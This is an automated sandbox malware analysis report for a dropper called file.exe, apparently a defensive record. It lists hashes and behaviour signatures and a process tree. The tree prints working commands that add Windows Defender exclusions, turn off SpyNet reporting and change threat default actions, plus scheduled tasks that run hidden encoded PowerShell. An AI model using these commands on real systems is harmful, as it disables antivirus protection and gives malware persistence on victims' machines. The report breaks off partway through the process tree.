Analysis

  • max time kernel
    91s
  • max time network
    105s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-11-2022 08:17

General

  • Target

    file.exe

  • Size

    7.2MB

  • MD5

    c104e431c084587ed2dc8c447b410c9c

  • SHA1

    f92d07d0d6bdeb2de00828d89b826dd215192a04

  • SHA256

    4346bb66ea4faac2c329b2cb9ed9f38e8f704baa5c7576295a526792bf007ace

  • SHA512

    bd78250b14febf10fa80f2c47e823f6037e93b0e87f26934dfd1b49dae053961048c4bd5ef51f2c839d17ac050a861d6e87f5bab592306103f256ec724eb1eba

  • SSDEEP

    196608:91O0BHMSmQg+se1Ysn2uLGWDyJUn5XFi87iW:3O0BsSmQnz1vnBKWmOnHR7J

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 29 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4440
    • C:\Users\Admin\AppData\Local\Temp\7zSD287.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1264
      • C:\Users\Admin\AppData\Local\Temp\7zSDB03.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks computer location settings
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:4808
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2968
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2296
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:2500
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:2892
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4752
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1296
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:3792
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:1520
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gLNljdPJL" /SC once /ST 00:04:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:2824
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gLNljdPJL"
                  4⤵
                    PID:4092
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gLNljdPJL"
                    4⤵
                      PID:504
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bmPPeHndeZJiZewMwY" /SC once /ST 09:18:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG\YjtjmvkzxwbTrRZ\DdGsvFD.exe\" pT /site_id 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:1764
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                1⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3640
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  2⤵
                    PID:2376
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                  1⤵
                    PID:4524
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                    1⤵
                      PID:4228
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:1672
                      • C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG\YjtjmvkzxwbTrRZ\DdGsvFD.exe
                        C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG\YjtjmvkzxwbTrRZ\DdGsvFD.exe pT /site_id 525403 /S
                        1⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious use of WriteProcessMemory
                        PID:4204
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                          2⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2812
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3776
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                              4⤵
                                PID:1800
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                              3⤵
                                PID:3588
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                3⤵
                                  PID:2412
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                    PID:4328
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                      PID:2312
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:904
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:4356
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                            PID:4256
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:4708
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                                PID:4420
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:1428
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:4960
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                      PID:4088
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                      3⤵
                                                        PID:3644
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                          PID:5096
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                            PID:2368
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:4400
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                                PID:5080
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:1540
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                    PID:1480
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                    3⤵
                                                                      PID:2500
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                        PID:4040
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:2836
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:3816
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PTcVEVWfzVfU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PTcVEVWfzVfU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SnQMkCffU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SnQMkCffU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XracVvRTBJUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XracVvRTBJUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nNoOyOjreWgVC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nNoOyOjreWgVC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\DIqJuicHJdmqOkVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\DIqJuicHJdmqOkVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\dEvNveGTTlDzBjVk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\dEvNveGTTlDzBjVk\" /t REG_DWORD /d 0 /reg:64;"
                                                                          2⤵
                                                                          • Drops file in System32 directory
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4512
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR" /t REG_DWORD /d 0 /reg:32
                                                                            3⤵
                                                                              PID:2516
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR" /t REG_DWORD /d 0 /reg:32
                                                                                4⤵
                                                                                  PID:2824
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR" /t REG_DWORD /d 0 /reg:64
                                                                                3⤵
                                                                                  PID:4792
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PTcVEVWfzVfU2" /t REG_DWORD /d 0 /reg:32
                                                                                  3⤵
                                                                                    PID:428
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PTcVEVWfzVfU2" /t REG_DWORD /d 0 /reg:64
                                                                                    3⤵
                                                                                      PID:4324
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SnQMkCffU" /t REG_DWORD /d 0 /reg:32
                                                                                      3⤵
                                                                                        PID:4368
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SnQMkCffU" /t REG_DWORD /d 0 /reg:64
                                                                                        3⤵
                                                                                          PID:4340
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XracVvRTBJUn" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:4532
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XracVvRTBJUn" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:3108
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNoOyOjreWgVC" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:3472
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNoOyOjreWgVC" /t REG_DWORD /d 0 /reg:64
                                                                                                3⤵
                                                                                                  PID:2344
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\DIqJuicHJdmqOkVB /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                    PID:3028
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\DIqJuicHJdmqOkVB /t REG_DWORD /d 0 /reg:64
                                                                                                    3⤵
                                                                                                      PID:3744
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                        PID:4940
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                          PID:4232
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\dEvNveGTTlDzBjVk /t REG_DWORD /d 0 /reg:32
                                                                                                          3⤵
                                                                                                            PID:4348
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\dEvNveGTTlDzBjVk /t REG_DWORD /d 0 /reg:64
                                                                                                            3⤵
                                                                                                              PID:5056
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /CREATE /TN "gnfhMqZJv" /SC once /ST 03:02:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                            2⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:4968
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /run /I /tn "gnfhMqZJv"
